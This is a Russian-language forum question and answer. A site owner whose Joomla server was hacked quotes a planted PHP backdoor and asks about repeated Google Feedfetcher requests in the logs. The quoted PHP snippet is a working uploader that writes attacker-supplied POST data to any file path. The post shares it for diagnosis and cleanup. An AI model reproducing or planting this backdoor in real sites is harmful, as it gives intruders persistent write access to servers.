Мой сервер недавно был взломан из-за Joomla и allow_url_fopen = ON. Я вижу различные файлы php в корне моего сервера, содержащие это содержимое.
Restricted accoss
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);
поэтому я закрываю allow_url_fopen и удаляю все эти файлы. Теперь мой сайт работает нормально в течение нескольких минут, но каждые несколько секунд он отправляет запросы на этот адрес с указанием этого сообщения в error_log
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
Это я много раз вижу в access_log
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
Так это нормально?
Похоже, кто-то злоупотребляет Google App Engine. Проверьте свой журнал доступа Apache для этого IP-адреса, и в строке пользовательского агента должен быть идентификатор приложения. Затем вы можете сообщить о нарушении в Google.